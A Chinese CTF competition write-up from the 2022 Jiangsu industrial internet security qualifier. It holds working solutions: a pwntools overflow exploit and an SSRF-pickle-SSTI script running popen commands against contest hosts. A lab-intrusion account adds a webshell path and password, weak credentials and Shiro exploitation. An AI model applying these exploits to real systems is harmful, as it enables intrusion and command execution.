发表更新安全竞赛17 分钟读完 (大约2591个字)0次访问

2022年中国工业互联网安全大赛江苏选拔赛

比赛心得,竞赛组织的奇烂无比,理论竞赛环境崩了四次,一个python环境修到了竞赛结束的半个小时,更有甚队伍,竞赛在环境flag不对的情况下,成果提交得分,简直牛逼plus。pwn题不提供附件,re提供错误附件。这竞赛出题能力也是超绝。最主要用的题目全是TM网上的原题2222223

10081 xm

理论赛

做成了狗屎

CTF

pwn1

下附之前做的xctf原题结果

查看保护

image-20221103103110769

开启了NX

IDA分析程序

image-20221103103120959

输入1进入login(),无漏洞函数

image-20221103103211392

输入username(长度19)和password(长度199),无缓冲区溢出

image-20221103103227594

读取password(s)长度,如果在3-8之间免责将其写入dest,此处s长度为0x199以内,而dest为14,存在缓冲区溢出,但是想要达成利用,需要v3的结果满足3-8之间,v3为unsigned _int8,即0-256,输入长度260,则整数溢出使得v3为4

查找后门函数

image-20221103103241724

地址为0x804868B,此时

|padding(14+4)|+|0x804868B|+|padding2(260-14-4-4)|即可覆盖返回地址

Exp:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
from pwn import *

context(arch = 'amd64',os = 'linux',log_level = 'debug')

p = remote('222.186.10.114',18020)

offset = 0x14 + 4
system_addr = 0x804868B

offset2 = 0x104-0x14-4-4

payload = b'a'*offset + p32(system_addr) + b'a'*offset2
p.recvuntil('choice:')
p.sendline('1')
p.recvuntil('username:')
p.sendline('111')
p.recvuntil('passwd:')

p.sendline(payload)

p.interactive()

image-20221103103255207

flag值:flag{7KHGUG8XFGK8JZ67}

协议分析1

思路:wireshark分析流量包,存在mms协议 -> 发现存在异常 -> 组合字符,进行base91解密,得到最终flag

\1. 简单分析协议,发现流量中的TCP协议里存在MMS协议。使用占比更小的MMS协议,作为过滤器应用。

image-20221103103833011

\2. 查看过滤后的流量数据,发现两条MMS流量存在异常。

image-20221103103852106

\3. 分析数据,图示地方存在异常。将异常数据提取出来,发现其ASCII码形式,经过组合,像是base91密文。密文为:@iH<,{Mu[8c*{Z&SHjB2F}A

image-20221103103944414

\4. 使用base91在线网站进行解密。http://www.hiencode.com/base91.html,最终得到

flag值:flag{3XZGqNB5xlf6}

通信流量

下载流量包发现存在GTP协议流量

先过滤出gtp协议一个个流量包看 字符串搜索sms数据

img

flag值: flag{china@iisc}

5 modbus

(请存在6写操作 发现写入png

分析发现存在的modbus写的操作

tshark -r 1667351929574.pcapng -T fields -e modbus.data -Y "modbus.func_code == 6 && ip.src == 192.168.111.138" | sed 's/^00//' |tr -d '\n'

直接用tshark工具先过滤一波

1
89504e470d0a1a0a0000000d49484452000001530000008b0803000000eb8f8ab0000000ba504c5445ffffff0000006600003a000066b6ffffffb600003affffdb90dbffffdb90dbffff3a90dbb66600903a00dbdbdb0066b6003a90db903a000066b6ffffffb666666666b6dbff003a66003a3affdbdbffdbb6b6b6b63a6690dbb666663a0066b6db3a666690663a3a3a00663a3a3a3a3a3a3a66b6663adbdbff66663a90b6dbdb90666690dbdbffb6dbb690aab6903a9090dbffdbb6c9dbdbb6b666b6b66690b63a66b66690909090669066663a90b6dbdb90b69090b6906690903a2e9a24be0000049a4944415478daed990973d3301085bd18ec24360981380929490a252d1428f70dffff6f513d4b2caa88308763cff0be993a96e55d3dbdda3ac609218410420821841042082184104208218410420821841042082184104208218410420821841042082184104208218490ff93bb4747f3e4ee38690524c6f13f223f1591c98d6b72bdc9cde66f3c1ef9a6c5fc42621c7f5f19daf97bf2574747673843be033095ecdec59b469d5ea7d920494a915b3f881ba6920d5af1b49449f2f7ac366258dc3152b36dd23ae86d9134ebf44ce4de1c9eaa89a6d86f4fa7b27c77f108cfc1eabe4046bbe07f3768e869298535119d75f13df7f47c5b3f0f10308da4ecc2d3fc66ed5d29c726461f83b4d79e3af110304c75d8525af5349c72cc7c1478faf1a614df2dcb2e90c1c58efc60cfd33c329b8db52ef0149947f617b34d4c695884ce83793a13900dea36cd8863b857379cdf47e1695da79e1633b97dc725b8f5c97a9a7f493119a0e007a34bf564f17684aed9f829a63b7baf14a1a775e870538b7a969a06e6495c29d632aa044071379e96921d572718d0d11b59540f64995ef51477bb57ca3de91b9165f54804555e304aafafc9719522b5ef296ad1ec3e4fdfa526934cd692551b813b31a590727c5944010c51d1cdbb7f6a07f46c00bf6ecf6b3d573d8517eedf6f32e0327ef2320c46fa3a628aa2e7a939a2989fedf1548a3a522623d3e42f9596c8ead2a202293af1144063e1c45b1f708b7a6aa3f41c77bbe0894d6b98594fd13fd75fdf5398a7849ec207a4b0f9e34ad1b6f609966eddb08a1c01ed7b7ac328b5fdd5ba35caf0d1f517de2083de8d333f18c74207b6f039cd06114f110a2ff5724c29164c56a91a0f701ad2aea7abf7270f44446db37546cd62a04a4d98bd454fd5353fd81eb5bd703c95ddcbfd9e5e7776e8e5b8d2ec21105c476bbaab428b016d8ea722b2dc55a914da0755aa9ea216a381cd80b27a8a62434fdd24bedc36f6f4574a1da1a7c3037b8a97700bf98152e395befbd63938d2d8d3bdefbee1ee692a5234f534a6d414df8e2da34427029bc48405b4e6a913875f6877b7047314025e636fe2de7d7f3cf58331286aad6b54a3d0a871bb99a751a528067435476103e7961e3a734c83b594db94c21037ef9b236e0b83dde48d9389f3492f8359734fe34a2125a09bb514a6d611d44ba11d5e4be8a95b37ba0cba46cc4b58e307bb9b75f56a6a4d09bf9fe730a4b9a751a52822e3ea4d02d6bb41679e26536c85d2c5c60e99f576e4f9b5c05303ccf332c8e23218a6f9c1a8ac2433b552d4b5661b94defe0a33cacbc0eae477c6d3b8d2592ab2abaa14f146205ae96acd7f9e9a6df30b2b7f6d4ad9931b81a736b2d00cba69dfe111f183911e17168f13708ec2dcad4f0d4b5435f234aa142b262745c71bf5f4e098b9d2ff2e02d3d4d378f0d80fbe5a7db6af8066ff8d52907b524c4bea691fc0e4611fd07e03a5f11b26491fc0a650bf9df418288db0ba8fb55687e41f1e43083650fa8daf87784a23e01b5f9760a1b27c988a6407fadfe2abb1e365bf95fe29cf4ee492ec60ef3b6668c7ad51af951242082184104208218410420821841042082184104208218410420821841042082184104208218410420821e4a77c030fc7566d992e0e920000000049454e44ae426082

提取出hex值 直接用winhex保存成png图片格式

img

flag值:flag{Modbus_Image?}

Re1

(请Elf程序,ida分析

img

img

对应write的系统调用

img

直接对应打印数据

Exp

1
2
3
4
5
6
7
8
9
10
11
str1 = [0x7F,0x45,0x4C,0x46,0x01,0x61,0x34,0x66,0x63,0x55,0x32,0x7D,0x79,0x31,0x7B,0x6C,0x02,0x00,0x03,0x00,0x01,0x00,0x00,0x00,0x4C,0x00,0x00,0x08,0x2C,0x00,0x00,0x00,0x67,0x2D,0x37,0x30,0x42,0x36,0xEF,0xBE,0x34,0x00,0x20,0x00,0x01]

str2 = [7,0xf,0x5,0x20,0xe,0x3,0x5,0x23,0xd,0x21,0x8,0x23,0xd,0x25,0x25,0x21,0x22,0xa,0x1,0x06,0xb]

flag =''

for i in range(len(str2)):

​	flag += chr(str1[str2[i]])

print (flag)

img

flag值:flag{Fa01-c0166-72E4}

EasyStego

(请foremost /root/Documents/jsgk/1667353839667.jpg

分离得到pdf 复制出来的发现存在特殊字符

img 

1
7=28L3FC?0E9603@@<DPP`PN

根据字符发现是ROT47编码直接解码获取flag

img

flag值:flag{burn_the_books!!1!}

wzsc

(条件竞争上传,直接使用bp爆破)

img

img

flag值:flag{4NE25HZVDN5RGF66}

funpy

(发现上传图片正常,上传php文件就访问不到,猜测被删了,直接条件竞争跑。

利用@/绕过get_domain 利用ssrf绕过本地ip限制,然后利用OpCode绕过r限制,最后覆盖name值ssti执行命令即可。

Web2 flag{ZRLCF5H9Z4XSKP4F})

img 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
import base64

import requests

headers = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36'
}
for i in range(500):
    payload1="{{().__class__.__bases__[0].__subclasses__()["+str(i)+"].__init__.__globals__['popen']('cat flag.txt').read()}}"
    payload3='''c__main__
ctf_config
(S'name'
S'{}'
db.'''.format(payload1).strip()
    payload2 = base64.b64encode(payload3.encode())
    url = "http://222.186.10.114:15823/get_baidu?url=http://127.0.0.1:8000/admin?data="+str(payload2)[2:-1]+"%23@www.baidu.com/"
    res = requests.get(url=url,headers=headers)
    if 'flag' in res.text: #以FileLoader为例
        print(i)
        print(url)
        print(res.text)

flag值:flag{ZRLCF5H9Z4XSKP4F})

签到-hello

( YUc1amFYdHFaMjV1Y1Y5TVZWOWxhbXR3WTJ0bGRYMD0=

两次base64解密,得到 hnci{jgnnq_LU_ejkpckeu}

使用凯撒解密,偏移量为2

img

flag值:flag{hello_JS_chinaics}

ezhash

( 直接写hash256爆破脚本)

img 

1
2
3
4
5
6
7
8
9
10
11
12
x = '2704efd1382cb3c01cb7962e5b8b06d5dcbe427a61460fb333e126fb646dc108'
import hashlib
n = b'86139'
s = list('0123456789'.strip())
import itertools
for i in itertools.product(s, repeat = 8):
    d = ''.join(i).encode()
    g = n+d
    if hashlib.sha256(g).hexdigest() == x:
        print(g)
        break
# b'8617091733716’

flag值:flag{8613984594729}

解方程

( 直接将代码丢到google发现,我们伟大的出题老师用的是CTFtime的原题,直接拿现有exp改一下变量

img 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
n = 8024564127973065791822696697071284794358778113244860389864422981119578975964727093926084927413648922361071020470150564725270618683354904686430544864634986421802250691574811643940493852040303365259871961829230451567976055242366978177493279020860227537560077272183489280971600541432160542487797473494437897108965642412346313867328843027097895335304551681879362719382890575460873246457441445622915378590294513103181807760404215667759122312502771211145132870220086702449210205047154398173087109995899654560082761774761002029827487645976212945576324039049642609852040160573026630219823125371936206527188545760503303196887
c = 3180315760809674805307952038308070668830050176909147638772126511895314499221741418872541998973065111255595861696385202759844093540441475048944982758690063571599282883876643362851380191511250087221840725807404705385725070244402516934527422750911874245857588078974219707033577370635383250007806947507795729667764154840835200953651638272748044402141790503341924861185059671075139783417203879567804845438302056071839026625956697647771368487584705007737854745577029320506832583174617443045018932772363892102614493216452482474734088789707913499300956365998233734355238725491161615031776255737012637741880932940505976334292


# import sympy
# p = sympy.Symbol('p')
# q = sympy.Symbol('q')
# f1 = pow(2,1024) - 1 + 31337 - (p + q)
# f2 = n - p * q
# result = sympy.solve([f1,f2],[p,q])
# print(result)
p = 82489564461427484138429550090132552795702149336804845991457103358176253229127370675969792065057152173809946056104472178496911325543350827134018681875705917009608058362246799798558207922841479865394443230979923827962082687904427293092936393489720798317782318826070444552061801758933280333283379833380472520009
q = 97279749024804106634500968988769920566095548557425811281972977799556422576373592456738685257350383847310167823766921179161878443271065795358828748763768207368159835062618685477744011678404614254058639721105081940876067994438035588380976717051106438845568191858515853687885444179546435971551976496243751648543
from Crypto.Util.number import *
import gmpy2
phi = (p - 1) * (q - 1)
k = 1
while True:
    k += 1
    e = 2 ** k - 1
    gcd = gmpy2.gcd(e, phi)
    e2 = e // gcd
    d = gmpy2.invert(e2, phi//gcd)
    m = pow(c, d, n)
    p, judge = gmpy2.iroot(m, gcd)
    plaintext = long_to_bytes(p)
    # print(plaintext)
    if b'flag' in plaintext and judge:
        print(plaintext)
        break

flag值:b’flag{brutE_f0rCe_1s_usefull}’

场景题

10.52.1.0/24

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
nmap -v -sn -PE -n --min-hostgroup 1024 --min-parallelism 1024 -oX nmap_output.xml 10.52.1.0/24
nmap -T4 -v -A -O 10.52.1.2
nmap -sS -Pn -n --open --min-hostgroup 4 --min-parallelism 1024 --host-timeout 30 -T4 -v -oG result.txt -iL ip.txt


Nmap scan report for 10.52.1.14
Host is up (0.021s latency).
Not shown: 998 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT     STATE SERVICE
80/tcp   open  http
3389/tcp open  ms-wbt-server

Nmap scan report for 10.52.1.17
Host is up (0.021s latency).
Not shown: 996 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
3306/tcp open  mysql
8080/tcp open  http-proxy

场景一

网站 10.52.1.14:80存在致远oa任意文件上传

http://10.52.1.14/kkkkk.jsp
passsssss

拿到shell权限发现是win server 2016服务器,但是是一个低权限账户,这里需要烂土豆提权,但是当时没有提成功,后面比赛给提示,直接远程进来了,在桌面上有一个flag。

然后挂frp内网穿透,扫描发现存在内网地址如下:

10.10.210.213 端口开放了 3389 直接弱口令扫描工具直接拿到端口权限 administrator 123456789

10.10.210.225 端口开放了23端口,直接 test 123456 直接上

在login目录下有一个用户名密码.txt文件产看文件,直接远程登录上去,在桌面存在flag

场景二

网站 10.52.1.17:8080存在致远oa任意文件上传

存在键盘弱口令和shiro命令执行,但是说实话真的一点都不弱

登录成功后直接env 下载heapdump文件分析获取key值

使用shiro工具直接可以命令执行获取root权限

但是这个环境在比赛结束我们才成功

2022年中国工业互联网安全大赛江苏选拔赛

http://www.greetdawn.top/2022/10/15/安全竞赛/2022年中国工业互联网安全大赛江苏选拔赛/

作者

丨greetdawn丨

发布于

2022-10-15

更新于

2023-05-06

许可协议

#

喜欢这篇文章?打赏一下作者吧

评论

关注我
×